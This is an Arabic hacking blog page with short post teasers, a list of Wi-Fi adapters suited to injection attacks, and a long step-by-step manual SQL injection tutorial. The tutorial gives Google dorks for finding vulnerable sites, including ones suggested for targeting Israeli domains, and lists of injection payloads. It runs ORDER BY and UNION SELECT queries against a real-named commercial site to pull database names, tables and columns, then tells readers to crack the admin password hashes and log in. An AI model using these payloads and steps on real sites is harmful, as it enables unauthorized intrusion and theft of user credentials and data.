مدونة كورتكس هكر 4 5 24
اكتب ما تود البحت عنه و اضغط Enter

بايثون المزيد

بايثون
معذرة، فالصفحة التي تبحث عنها في هذه المدونة ليست متوفرة.

السبت، 19 يناير 2019

ماهو الماك ادرس وطريقة تغييره في اللينكس والويندوز

 الماك أدريس MAC Address هو اختصار لــ Media Access Control Address والذي هو  عنوان ثابت لا يتغير لكرت الشبكة, وهو شبيه بالهوية الشخصية التي تحمل رقم فريد لا يتكرر، هذا الرقم مؤلف من 12 خانة, وتؤدي معرفة الأخرين للماك ادريس في كشف هوية المخترق وتتبع أي شخص  متصل بالانترنت.
cortex+hacker+logo

الجمعة، 18 يناير 2019

طريقة تشغيل نظام أندرويد نوجا على الحاسوب - بدون تثبيت
في بعض الأحيان قد نحتاج لتجربة تطبيقات وألعاب على الهاتف أو ربما نحتاج نسخة اندرويد معينة لتشغيل لعبة ما مثل Pubg وغيرها, أو ربما تحتاج لعب العاب اندرويد ولا تتوفر على جهاز او لا يروقك اللعب بالهاتف, فستضطر للبحث عن حل بديل, وهو تشغيل نظام الاندرويد على جهاز الكمبيوتر الخاص بك. وبهذه الطريقة ستمتلك نظام أندرويد خارق يعمل بمواصفات جهازك القوية.
في هذا المقال سنتعرف على طريقة تشغيل نظام اندرويد على الوهمي Virtualbox بطريقة سهلة وبسيطة.
المميز في هذه الطريقة دون غيرها أنك لا تحتاج لتثبيت نسخة الاندرويد بل هي جاهزة وأي شيء تثبته عليها يحفظ.

cortex+hacker+logo

الخميس، 17 يناير 2019

تسببت إضافة موجودة في متجر جوجل كروم والتي لا تزال متوفرة لحد الان في سوق Chrome الإلكتروني في سرقة معلومات بطاقات الدفع والحسابات البنكية وكللمات المرور الخاصة بالمواقع التي يزورها المستخدم.
تم العثور على الامتداد في فبراير 2018 ، ولكن الاضافة extenstion مخفية في عمليات البحث العادية ولن يكون متاحًا لك تثبيتها إلا من خلال الرابط الذي يستخدمه المهاجمون للانتشار.
تتنكر هذه الاضافة تحت اسم مشهور وهو Reader Flash , وهي تعتمد على طريقة الحقن ، بحيث يستخدم المهاجمون لإصابة مواقع الويب أكواد جافا سكريبت خبيثة javascript والتي تكشف المتصفح الذي يستخدمه الضحايا وعلى أساسه تشير إلى تثبيت الفلاش وإعادة توجيه متصفحك لتنزيل الإضافة.
cortex+hacker+logo

الأربعاء، 16 يناير 2019

افضل طرق وبرامج حماية الهاتف من الاختراق والتجسس والفيروسات
كما تعلمون الهاتف المحمول جزء لا يتجزء من حياتنا اليومية, وهي تعرف عنّا الكثير من المعلومات السرية والحساسة، مثل كلمات المرور والحسابات البنكية  ومعلومات بطاقة الائتمان، والرسائل والمعلومات والصور الشخصية, مما يجعل هواتفنا عرضة للاختراق والتجسس، وفريسة تسيل لعاب  أصدقائنا الفضوليين من حولنا, لذلك في هذا المقال سنتعرف على نصائح أمنية وطرق وتطبيقات تساعد مستخدمي الهواتف على حماية أنفسهم من الاختراق.
cortex+hacker+logo

الاثنين، 14 يناير 2019

افضل كروت الشبكة لاختراق الويفي - كالي لينكي

علاقة الكالي لينكس ومحول الواي فاي:

حتى الآن كالي لينكس يعد من أكثر أنظمة اختبار الاختراق انتشارًا على الإطلاق. وهو مجهز بأدوات والتي يمكن استخدامها لأداء أنواع مختلفة من اختبار اختراق تطبيقات الويب ، هجوم الشبكة وكذلك اختراق واي فاي. لدى Kali Linux مجتمع نشط  يستمر في إضافة أدوات جديدة وإصدار التحديثات بشكل دوري.
المشكلة الوحيدة مع كالي لينكس هي عدم وجود دعم للأجهزة والدريفرات Driver compatible.
والسؤال الذي يطرح ما هو أفضل محول وايفاي متوافق مع كالي لينكس, والذي يمكنه تنفيذ العديد من هجمات الحقن واختراق الواي فاي؟

اختيار أفضل USB واي فاي محول لكالي لينكس 2019 لقرصنة واي فاي

يبدو الجميع مرتبكًا عندما يتحدثون عن أفضل محولات USB اللاسلكية لـ Kali Linux والبطاقات اللاسلكية.
فهم لا يعرفون ماهيتهم ولماذا يحتاجون إليهم ولماذا يحتاجون إليهم ولأنهم يشترون لأن هناك الكثير من البطاقات اللاسلكية في السوق لكن القليل منها فقط مدعوم من Kali Linux من أجل  اختراق الواي فاي.
  • المحول اللاسلكي هو ببساطة جهاز يمكن توصيله بالكمبيوتر من خلال منفذ USB ويسمح لنا بالاتصال بأجهزة أخرى عبر شبكة WiFi. وهي مجموعة من الشرائح اللاسلكية التي تسمح للكمبيوتر المحمول المحمول الخاص بك أو الأجهزة الأخرى التي تتيح لك الاتصال بشبكة WIFI والوصول إلى الإنترنت أو الأجهزة المجاورة.

لماذا بطاقات الشبكة الخارجية WIFI مهمة للهكر؟

لقد تسأل لماذا تحتاج إلى محول USB لاسلكي لتوصيل الكمبيوتر المحمول لأنه يحتوي بالفعل على شرائح WiFi داخلية. نعم، أنت على صواب لأن معظم أجهزة الكمبيوتر المحمولة ومعظم الهواتف الذكية اليوم لديها شرائح WiFi داخلية.
في منظور القرصنة من واي فاي، فإن هذه المحولات التي تعمل بتقنية الواي فاي ليست ملائمة لإختبار شبكات Wi-Fi.
هذه هي مشاكل محولات Wi-Fi الالداخلية.
  • لا يمكن استخدام محولات WiFi المدمجة أو الوصول إليها بواسطة الأجهزة الظاهرية التي تعمل في الكمبيوتر المحمول Host.
  • لا يمكن استخدام معظم كروت الويفي WiFi الداخلي من أجل اختراق شبكة WiFi نظرًا لأنها لا تدعم جميع أوضاع WiFi ولا يمكنها تنفيذ هجمات الحقن التي تعد ضرورية جدا.
  • حتى إذا قمت بتثبيت كالي لينكس كنظام أساسي وتمتلك إمكانية الوصول إلى البطاقة اللاسلكية ، فلن تتمكن من تنفيذ هجمات WiFi لأن هذه المحولات التي تعمل بتقنية الواي فاي غير قادرة على تنفيذ العديد من هجمات حقن الواي فا باداة aircrack-ng وغيرها من أدوات قرصنة الواي فاي التي هي موجودة مسبقا داخل كالي لينكس.

أفضل محولات شبكة الوايفاي متوافقة مع الكالي لينكس:

ليست كل كروت الوايرلس تدعم اختبار اخترق الشبكات...الكروت التى تدعم ذلك هل الكروت التى تدعم الحقن,,
قبل البدء في الحديث عن ماركات محول Wi-Fi المدعومة من Kali Linux ، دعنا نلقي نظرة على العوامل الأكثر أهمية
شرائح WiFi Chipset المستخدمة في محولات USB Wi-Fi هي الدماغ أو يمكنك تسميتها كعقل محول USB Wi-Fi الذي يقوم بجميع الحسابات الخاصة به. هي مجموعة شرائح Wi-Fi التي تحدد ما إذا كان محول USB Wi-Fi جيدًا أو سيئًا.
هناك الكثير من الرقاقات chipset المدعومة من قبل كالي لينكس والتي يمكن استخدامها لأداء حقن Packet injection المختلفة والهجمات الأخرى. أفضل المحولات التي يتم استخدامها من قبل معظم الهكر هي:

اثيروس Atheros AR9271

يدعم هذا وضع مراقبة رزمة حقن دعم وضع والماستر packet injection monitor mode and master mode الذي يسمح لاستخدام هذا كنقطة وصول لإنشاء هوت سبوت وهمية لعمل هجوم التوأم الشر Evil twin attack. 
المشكلة الوحيدة مع هذه الشريحة انها تدعم تردد 2.4 جيجاهرتز فقط.
افضل كروت الشبكة لاختراق الويفي على كالي لينكس

TP-Link N150 TL-WN722N

إذا كنت مبتدئًا وبدأت في اختبار اختراق Wi-Fi ، فربما يكون هذا هو أفضل محول WiFi لك. يعتبر صغير الحجم ولكن لا يزال يمكنه التقاط الحزم واي فاي من مسافة جيدة. يمكنك استخدامه لتنفيذ هجمات الحقن المختلفة والتقاط حزم المصافحة. متوافق مع كالي لينكس ويمكن استخدامه مع أدوات air-crack المختلفة.
افضل كروت الشبكة لاختراق الويفي على كالي لينكس

الفا AWUS036NHA ALFA

 مصنوع من قبل شركة مشهورة جدًا هي Alpha التي تشتهر بإنتاج أجهزة Wi-Fi مثل كروت USB Wifi وأجهزة التوجيه والهوائيات وأجهزة الشبكة الأخرى. هذا هو واحد من محول WiFi الأكثر استخدامًا والذي يتوافق مع Kali Linux ويمكن استخدامه لإجراء جميع الهجمات تقريبًا مرة أخرى 2.4 شبكات Wi-Fi gigahertz. يأتي مع هوائي 9 ديسيبل قابل للاستبدال ويمكن توصيله بهوائيات أخرى مع زيادة في القدرة. هذا هو واحد من أفضل َadapter  واي فاي لكالي لينكس.
افضل كروت الشبكة لاختراق الويفي على كالي لينكس

رالينك RT 307 Ralink

افضل كروت الشبكة لاختراق الويفي على كالي لينكس

الفا AWUS1900

إذا كان السعر لا يمثل مشكلة بالنسبة لك ، فهذا هو أفضل محول USB WiFi 2019 الذي يمكن أن يأخذ مهارات القرصنة إلى مستوى جديد تمامًا. يحتوي هذا المحول اللاسلكي على 4 فتحات لهوائي WiFi مما يزيد من نطاق إشارة WiFi بشكل كبير وستكون قادرًا على التقاط إشارات WiFi من مسافة بعيدة جدًا.
افضل كروت الشبكة لاختراق الويفي على كالي لينكس

الفا AWUS036ACH

افضل كروت الشبكة لاختراق الويفي على كالي لينكس

باندا  Panda PAU06

افضل كروت الشبكة لاختراق الويفي على كالي لينكس

وهذه قائمة  لكروت الشبكة الباقية


3Com
OfficeConnect Wireless 11a/b/g PC Card 3CRWE154A72
11a/b/g Wireless PC Card w/ XJACK Antenna 3CRPAG175
(Wireless 11a/b/g PC Card with XJACK Antenna (3CRPAG175B
11a/b/g Wireless PCI Adapter 3CRDAG675
(Wireless 11a/b/g PCI Adapter (3CRDAG675B
(OfficeConnect Wireless 108Mbps 11g XJACK PC Card (3CRXJK10075
Acer
Nplify 802.11 b/g/n
AirLink
AWLH-4030
AOpen
AOI-811
Atheros
Atheros reference design
Atheros AR5001X
Atheros AR5002X
Atheros AR5002G
Atheros AR5004X
Atheros AR5004G
AT&T
Plug and Share 6500G
Plug and Share 6550G
Plug and Share 6700G
Alfa
AWUS036NH
AWUS036NEH
AWUS051NH
Blitzz
BWI715
NetWave Point PC
Cisco
Aironet CB21AG
Conceptronic
C54i
D-Link
AirPro DWL-AB650
AirPlus DWL-650
DWL-G650
DWL-AG650
DWL-AG520
DWL-G520
DWL-AG530
DWL-G630
DWL-G510
IBM
T40p/IBM ab miniPCI
T42/IBM abg miniPCI
HP
(WLAN W500 (a/b/g)
(WLAN W400 (b/g)
Gigabyte
GN-WMAG01
GN-WLMA102
GN-WIAG01
GN-WIAG02
LANCOM Systems
AirLancer MC-54ab
AirLancer MC-54ag
Level One
WNC-0300
WPC-0300 v3
Linksys
WMP55AG
(WPC55AG (chipset AR5006X or AR5212
WPC54G V7
WRT54G v.7
WPC300N V2
WRT350N V2
NEC
Aterm WL54AG and PA-WL/54AG
Netgear
WAG11
WG311
WG311T
WG511T
WPN511
Netgate/Senao/EnGenius
5034CB Aries
5354 Aries 2 4G
Nortel
2201 PCMCIA
Peabird
WLG-PCMCIA-TURBO
Planet
WL-3560
Procomp Informatics
PW-8860AS
Proxim
(Orinoco 11b/g PC Card Silver (8471-WD
Orinoco Gold 8470
Orinoco Gold 8470-FC
Orinoco Gold 8470-WD
Orinoco Gold 8480-WD
Orinoco Silver 8481-WD
(Orinoco Silver 6460 (uncertain
SMC
2335W
Sony
PCWA-C300S
SPARKLAN
WMIA-105AG
WMIA-112AG
WMIA-123AG
TOPCOM
SKYR@CER PRO PCI 154
SKYR@CER PRO PC CARD 3054
TP-LINK
TL-WN510G
TL-WN322G
TL-WN7200ND
Wistron
AWLH-4030
CM9
cortex+hacker+logo

الأحد، 13 يناير 2019

اختراق الاندرويد بواسطة بايلود
سنتعرف في هذا المقال على طريقة اختراق هواتف اندرويد بواسطة مشروع الميتاسبلويت, سنستعمل ما يسمى البايلود ونتعلم كيف يتم تكوين البايلود والاختراق سواء كان داخل الشبكة باستعمال الي بي الداخلي أو الخارجي,
من المفروض أن لديك نظرة عن الاختراق بصفة عامة, وان لم يكن سأشرح بشكل بسيط كيف تتم العملية
يجب أن تعرف أن الاختراق نوعين:
cortex+hacker+logo
اوامر الحقن اليدوي

ما هو الحقن SQL INJECTION:

الحقن هو إستغلال خطأ برمجي في قاعده البيانات لحقن بعض الجمل البرمجية التي تهدف إلى قراءة أو تغيير  المعلومات الحساسة الموجودة بقاعدة البيانات Database مثل أرقام حسابات البنكية, أسماء المستخدمين وكلمات المرور والايميلات... . لأن ثغرة الحقن تمكن الهكر من اضافة أو  تغيير أوامر برمجية مما يؤدي لتغير وظائف النظام وجعلها في خدمته.

كيف تحدث هذه الثغرات؟

هذه الثغرات تحدث نتيجة لعدم مراقبة و تصفية مدخلات المستخدم inputs لبعض الحروف والرموز الخاصة (ESCAPE CHARACTERS) المضمنة داخل جمل لغة الاستعلام البنيوية، أو ان لا يتم تحديد نوعية المدخلات ان كانت نصية STRINGS ام عددية INTEGERS ...

ما ذا يعني عدم تصفية مدخلات المستخدم ؟

سأعطيك مثال:
هذه الجملة تبين كيف تحدث هذه الثغرة:

SELECT * FROM Users WHERE name = ' + UserName + ';
هذه الجملة سوف تستدعي جميع السجلات الخاصة باسم المستخدم (UserName) من جدول (Users),
لكن إذا تم تغير المتغير (userName) بشكل معين وباستخدام الرمز الخاص ( ' ) من قبل المستخدم المخترق ( الهكر ), فمن الممكن لهذه الجملة ان تفعل أكثر مما هو محدد لها,
مثلا يمكن استبدال قيمة المتغير (userName) بالجملة الأتية:
a' or 't'='t'
هذه المساوات دائما صحيحة TRUE
وبالتالي تصبح الجملة كالاتي:

SELECT * FROM users WHERE name = 'a' or 't'='t';

أذا تم أستخدام الجملة السابقة للتأكد من هوية المستخدم أثناء تسجيل الدخول للموقع .
فمن الممكن اختراق الموقع بهذه الطريقة  والحصول على الصلاحية لأن نتيجة المعادلة 't'='t' هي دائما صحيحة (TRUE)..
وبهذه الطريقة جعلنا أمر التحقق من اسم المستخدم صحيح, بدون معرفة اسم المستخدم.

ومثال أخر، لنفرض أن لديك لوحة تحكم أو تريد الدخول على منتدى أو موقع  يتطلب اسم مستخدم وكلمة مرور ، هنا يستطيع الحاقن إدخال العبارة البرمجية الأتية في مكان اسم المستخدم وكلمة السر
" " password' OR '1'='1
مما يمكن للحاقن بالدخول للنظام من دون أي كلمة سر.(طبعا في حال كانت المدخلات غير مفلترة)
ربما مللت من الكلام النظري ومن المصطلحات لكنها ضرورية لفهم ما يحدث من حولك, تابع معي طريقة العملية التي يسلكها الهكر لاختراق موقع

طريقة البحث عن مواقع مصابه بثغرة الحقن SQL INJECTION

لابد لنا من مواقع مصابه لكى نقوم بحقنها واستخراج البيانات الحساسه منها ولكي يتسنى لنا ذلك لابد من البحث عنها !
السؤال يطرح نفسه كيف نقوم بذلك اقول وبالله التوفيق لابد ان يتوفر لنا دورك DORK + محرك بحث قوي مثل قوقل مع بعض المجهود فلنتابع!

هذه أمثلة على الدوركات DORKS:
·page.php?id=
·trainers.php?id=
·article.php?ID=
·games.php?id=
·newsDetail.php?id=
·staff.php?id=
·products.php?id=
·news_view.php?id=
·opinions.php?id=
·pages.php?id=
·prod_detail.php?id=

كيف تستخدم الدوركات DORKS في عملية البحث عن المواقع المصابة

يتم استخدامها بدمجها مع الاستعلام التالى :
"inurl:."domain"/"dorks" "

شرح الاستعلام
"inurl:."domain"/"dorks" "
التعليمة  :Inurl وتعني ابحث بداخل رابط الموقع
ويمكن استبدالها باحد الكلمات التاليه
intitle:
intext:
define:
site:
info:
link:
التعليمة :Domain وتعني نوع المواقع المراد البحث عنها
من امثلتها :
.gov = Government websites
.edu = Educational websites
.org = Organizational websites
.com = Commercial websites
.info = Informative websites
.net = Networking websites ( similar to .com)
أو يمكن استخدام il بمعنى اساهداف مواقع اسرائيلية  FR فرنسية ... الخ
تنويه:
مواقع GOV هي مواقع حكومية, لذلك يجب عليك عدم التهور والتجربة عليها, فسيعرضك العبث معها لعقوبات. وربما السجن لا قدر الله.

التعليمة : Dorks وتعني الدورك المستخدم من طرفنا

مثال تطبيقى على هذا الاستعلام

"inurl:.com/page.php?id="

بمعنى ابحث عن الروابط التى بها هذا الامتداد: =.com/page.php?id
نذهب الى محرك البحث قوقل ونكتب بها الأمر خاصتنا
"inurl:.com/page.php?id="
ونبحث وستظهر لك النتائج
dork-google-onsec.tk



النتيجه
ظهرت عدة مواقع بالصفحه نبدأ بفحص الثغرة هل هي موجودة بها ام لا
طريقة الفحص سهلة جدا, افتح أي موقع من النتائج واضف له علامة التنصيص الفرديه كومه [ ' ] .‬في نهاية الرابط
بهذا الشكل

‫'‪www.marinaplast.com/page.php?id=13‬‬
‫ونستطيع استبدال عالمة كومه [ ' ] بما ياتى ادناه‬(لأنه في بعض الحالات تكون مفلترة والموقع مصاب ولا يظهر بأنه مصاب)

‫"‬
‫‪/‬‬
‫*‪/‬‬
‫‪#‬‬
‫)‬
‫(‬
‫')‬
‫'(‬
‫‪and 1=1‬‬
‫‪and 1=2‬‬
‫‪and 1>2‬‬
‫‪and 1<=2‬‬
‫‪+and+1=1‬‬
‫‪+and+1=2‬‬
‫‪+and+1>2‬‬
‫‪+and+1<=2‬‬
‫‪/**/and/**/1=1‬‬
‫‪/**/and/**/1=2‬‬
‫‪/**/and/**/1>2‬‬
‫‪/**/and/**/1<=2‬‬
‫‪/**/or/**/1/**/=/**/1‬‬
‫‪/**/or/**/1/**/=/**/2‬‬
‫‪/**/or/**/1/**/>/**/2‬‬
‫‪/**/or/**/1/**/<=/**/2‬‬
‫‪and 50=50‬‬
‫‪and 50=52‬‬
‫‪and 50>52‬‬
‫‪and 50<=52‬‬
‫‪+and+50=50‬‬
‫‪+and+50=52‬‬
‫‪+and+50>52‬‬
‫‪+and+50<=52‬‬

بعد اضافة علامة التنصيص ' في نهاية الرابط , كيف نعرف بان الموقع مصاب ؟
الجواب ببساطة...
ان ظهر لك أي خطأ بالصفحة, فهذا يعني ان الموقع مصاب ويمكن اختراقه بسهولة

sql injection error

هذا نص للخطأ الذي يظهر :
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\'' at line 1)
و‫هذه الأخطاء تختلف من قاعدة بيانات لأخرى ولكن لا يهمنا, ما يهمنا أنه يوجد خطأ وهذا يعني أن الموقع مصاب بثغرة الحقن SQLi.

أمثله على اخطاء القواعد المختلفه‬

MySQL server_database
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax
warning mysql_fetch_array() supplied argument is not a valid mysql result resource in
warning mysql_fetch_assoc() expects parameter 1 to be resource boolean given in
warning mysql_num_rows() expects parameter 1 to be resource boolean given
warning mysql_num_rows() supplied argument is not a valid mysql result resource in
warning mysql_fetch_assoc() supplied argument is not a valid mysql result resource in
warning mysql_connect() function.mysql-connect can't connect to mysql server on
warning mysql_result() expects parameter 1 to be resource boolean given in
mssql _databa se
warning mssql_connect() function.mssql-connect unable to connect to server
warning mssql_query function.mssql-query message invalid object name
warning mssql_pconnect function mssql pconnect unable connect server
MS-Access_database
Microsoft JET Database Engine error '80004005' Unspecified error
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver]
Oracle_database
Warning: oci_parse() [function.oci-parse]: ORA-01756
بعدما حصلنا على موقع مصاب بثغرة الحقن نبدأ الأن بالخطوة المهمة وهي عملية الحقن


  • ‬استخدام الامر ‪ ORDER-BY‬لتحديد عدد الاعمده‬


‫الموقع المصاب ‪:‬‬
‫‪www.marinaplast.com/page.php?id=13‬‬
‫لكى نقوم بحقن الموقع لا بد لنا من معرفة عدد الاعمده التى تحتويها قاعدة بيانات هذا الموقع ولكى نعرف ذلك سوف نستخدم الاستعلام ‫التالى ‪ ORDER-BY‬لتحديد عدد االعمده
بهذه الكيفيه ادناه‪:‬‬
‫خطاء ‪www.marinaplast.com/page.php?id=13+ORDER+BY+100‬‬
‫خطاء ‪www.marinaplast.com/page.php?id=13+ORDER+BY+50‬‬
‫خطاء ‪www.marinaplast.com/page.php?id=13+ORDER+BY+25‬‬
‫خطاء ‪www.marinaplast.com/page.php?id=13+ORDER+BY+20‬‬
‫خطاء ‪www.marinaplast.com/page.php?id=13+ORDER+BY+15‬‬
‫خطاء ‪www.marinaplast.com/page.php?id=13+ORDER+BY+10‬‬
‫خطاء ‪www.marinaplast.com/page.php?id=13+ORDER+BY+7‬‬
‫اليوجد خطاء ‪www.marinaplast.com/page.php?id=13+ORDER+BY+6‬‬
كما لاحظت نجرب الاعمدة من 100 وننزل حتى يختفي الخطأ.
عندما وصلنا ل +ORDER+BY+6 ‫اختفى الخطأ عند الرقم 6 ‬اذن نستنتج من ذلك ان عدد الاعمده هو ستة‪.‬‬
‫ملحوظه ‪:‬‬
‫‬ان لم بظهر خطاء عند استحدام ‪ ORDER+BY+100‬نستخدم مايسمى ‪ : String Injection
وننوه الى ان الحقن السابق يسمى ‪:‬‬ ‫‪Integer Injection

‫ويتم ذلك ‪:‬‬
‫باضافه علامة كومه [ ' ] بعد رقم المتغير سواء كان رقمى او نصى‪:‬‬
‫'‪/page.php?id=13‬‬
‫'‪/page.php?id=gaza‬‬
‫واضافة علامة ‪ +--+‬فى نهاية الرابط‪:‬‬
‫‪/page.php?id=13'+ORDER+BY+100+--+‬‬
‫مثال تطبيقى‬:
www.marinaplast.com/page.php?id=13'+ORDER+BY+100+--+ ‫خطاء‬
www.marinaplast.com/page.php?id=13'+ORDER+BY+50+--+ ‫خطاء‬
www.marinaplast.com/page.php?id=13'+ORDER+BY+25+--+ ‫خطاء‬
www.marinaplast.com/page.php?id=13'+ORDER+BY+20+--+ ‫خطاء‬
www.marinaplast.com/page.php?id=13'+ORDER+BY+15+--+ ‫خطاء‬
www.marinaplast.com/page.php?id=13'+ORDER+BY+10+--+ ‫خطاء‬
www.marinaplast.com/page.php?id=13'+ORDER+BY+7+--+ ‫خطاء‬
www.marinaplast.com/page.php?id=13'+ORDER+BY+6+--+ ‫لا يوجد خطاء‬

‫حيل لمعرفة عدد االعمده‬


  • استخراج عدد االاعمده بأستعلام واحد مباشر‬

+order by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37
,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,
71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99


  • ‫او‬
'+order by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37
,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,
‫‪71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99 +--+‬‬

‫مثال تطبيقى ‪:‬‬

‫‪www.marinaplast.com/page.php?id=13+order by‬‬
‫‪1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37‬‬
‫‪,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,‬‬
‫‪71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99‬‬
الشامل في اختراق المواقع - الحقن اليدوي SQL INJECTION

ظهر الخطا التالي:
MySQL Error: 1054 (Unknown column '6' in 'order clause')
بمعنى العمود رقم 6 بالتالى عدد الاعمده يكون 5

  • استخدام التعليمة ‪ UNION SELECT‬لإيجاد الأعمده المصابه‬
‫في الخطوة السابقة علمنا ان عدد الأعمدة هو 5 ‬فكيف نستغل معرفتنا لعدد الأعمدة
نقوم باستخدام الاستعلام التالى ‪UNION‬‬ ‫‪ SELECT‬بهذه الكيفيه‪.‬‬
‫‪http://www.marinaplast.com/page.php?id=13+union+select+1,2,3,4,5‬‬--
‫ملحوظه ‪:‬‬

  • أولا : يجب انهاء الرابط باضافة [‪ [+--+‬اذا كانت القاعده ‪ STRING MÉTHODE ‬

او  اضافة العلامة [‪ [--‬اذا كانت القاعده ‪INTEGER‬‬‪ MÉTHODE
كالتالى‪:‬‬
‫‪+union+select+1,2,3,4,5 -‬‬‫

  • ثانيا ‪: ‬وضع اشارة  [‪ [-‬قبل رقم المتغير سواء كان رقمى او نصى لنخبر القاعده بتجاهل كل مايأتى بعدها ‪ ‬كالتالى‪:‬‬

‫‪http://www.marinaplast.com/page.php?id=-13+union+select+1,2,3,4,5--‬‬‫ا
و نحذف رقم المتغيرid=-13  ونضيف مكانه ‪NULL‬‬
‫‪/page.php?id=NULL‬‬
طرق متعدده لجعل الرابط سالب ‪:‬‬
id=-1
id=null
id=1+and+false+
id=9999
id=1 and 0
id==1
id=1*0

بعد التجريب على موقع اخر

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--

ظهر لنا الاعمدة المصابة وهي كثيرة العمود 11 و 2 و 7

في الموقع الذي وضعت عليه الشرح ظهر لنا العمود المصاب وهو رقم ثلاثه‬ 3
‫ملحوظه ‪:‬‬
‫فى حالة ان رقم العمود المصاب لم يظهر بالصفحه ‪ .‬نضيف قبل ‪ union select‬احد االاستعلامات الاتيه‪:‬‬
‫‪+AND+1=0‬‬
‫‪/*!aND*/ 1 like 0‬‬
‫‪+/*!and*/+1=0‬‬
‫‪+and+2>3+‬‬
‫)‪+and(1)=(0‬‬
‫)‪and (1)!=(1‬‬
‫‪+div+0
بعد معرفة العمود المصاب (3) نبدأ بمرحلة الحقن و استخراج المعلومات الحساسة من القاعدة

حقن الموقع و ‬استخراج البيانات من القاعده‬

‫نعود لمثالنا السابق (الموقع الضحية)
‫‪http://www.marinaplast.com/page.php?id=-13+union+select+1,2,3,4,5--
بعدما عرفنا رقم العمود المصاب وهو العمود الثالث

  • نقوم باستخراج اصدار قاعدة البيانات version


‫مكان العمود المصاب (العمود الثالث) نضع الامر ()‪ @@version أو  version‬لاظهار اصدار القاعده‪.‬‬
version()
@@version
مثال:
‫‪http://www.marinaplast.com/page.php?id=-13+union+select+1,2,3,4,5 --‬‬

‫‪http://www.marinaplast.com/page.php?id=-13+union+select+1,2,version(),4,5 --‬‬

ظهر لنا بالصفحة ‫اصدار القاعده 5.1.73-0ubuntu0.10.04.1
ظهر لنا بالصفحة ‫اصدار القاعده 5.1.73-0ubuntu0.10.04.1


‫وهو االصدار 5 الذى تستخدم معه اوامر استخراج البيانات, بعكس االصدار الرابع 4 من القاعده الذى ال ينفع معه الا التخمين  وهو متعب

‫فى حالة تعذر استخدام االستعالم ()‪version‬‬
يمكننا استبداله بــ‪

‫)‪convert(version() using latin1‬‬
‫)))(‪unhex(hex(version‬‬
‫‪@@GLOBAL.VERSION‬‬
‫‪(substr(@@version,1,1)=5) :: 1 true 0 false‬‬

  • ‫ثانيا ‪ :‬استخراج اسم قاعده البيانات‪:‬‬

نحتاج اسم قاعدة البيانات حتى نقوم بالبحث داخلها عن البيانات التي نريدها مثل جدول الاسماك وكلمات المرور او جدول الحسابات البنكية
نقوم بكتابة أحد هذه الاوامر في مكان العمود المصاب (بنفس الطريقة دائما)

‫‪DB_NAME‬‬()
‫‪@@database‬‬
database()‬‬

مثال لتطبيق الامر
http://www.marinaplast.com/page.php?id=-13 union select 1,2,database(),4,5--


  • ثالثا :‫ استخراج أسم المستخدم USER‬:

قم بوضع أحد الأوامر الاتية مكان العمود المصاب

@@user
user()
user_name()
system_user()

‫تطبيق عملى‬ (وضعنا user) مكان العمود المصاب الثالث

http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 --

الأن ركز معي جيدا حتى لا تختلط عليك الاستعلامات!
في هذه المرحلة سنحتاج استخراج جميع الجداول الموجودة بقاعدة البيانات
لماذا نحتاج استخراج اسماء الجداول Tables ؟
نحتاج استخراج جميع الجداول حتى نحصل على جدول لاسماء المستخدمين المسجلين بالموقع او المنتدى وبعدها نستخرج كلمات المرور الخاصة بهم والحسابات البنكية ان كانت مسجلة وكان موقع تجاري الطريقة كما يلي:

  • كيفية استخراج الجداول Tables

ضع هذا الأمر مكان العامود المصاب
group_concat(table_name)
بهذا الشكل
http://www.marinaplast.com/page.php?id=-13 union select 1,2,group_concat(table_name),4,5
وضع هذا الأمر في نهاية الرابط
+from+information_schema.tables+where+table_schema=database()--
ليصبح الأمر بهذا الشكل
http://www.marinaplast.com/page.php?id=-13 union select 1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()--
ومعنى هذا الاستعلام كاملا هو: قم باستخراج مجموعة الجداول group concat من مخطط schema قاعدة البيانات database الخاصة بالموقع
أمر استخراج اسماء الأعمدة column_name
يوضع هذا الأمر مكان العمود المصاب في مثالنا هو العمود 3
group_concat(column_name)
ويوضع هذا الأمر في نهاية الرابط
+from+information_schema.columns+where+table_schema=database()--
ليصبح الرابط كاملا بهذا الشكل
http://www.marinaplast.com/page.php?id=-13+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_schema=database()--
الان نستخرج اسماء المستخدمين وكلمات المرور من الجدول الخاص بهم وهو يختلف من موقع لاخر, وتجد اسم الجدول هكذا:
admin(s), user(s), member(s), admin_tbl, user_tbl, member_tbl

بعدها توجه لموقع فك الهاش وقم بفك كلمة المرور وادخل على الموقع.
في الدروس القادمة ان شاء الله سأضع مثال تطبيقي لاختراق موقع بشكل تطبيقي
في أمان الله
cortex+hacker+logo
نظام مزود بثغرات ونقاط ضعف للتدرب على الاختراق Metasploitable

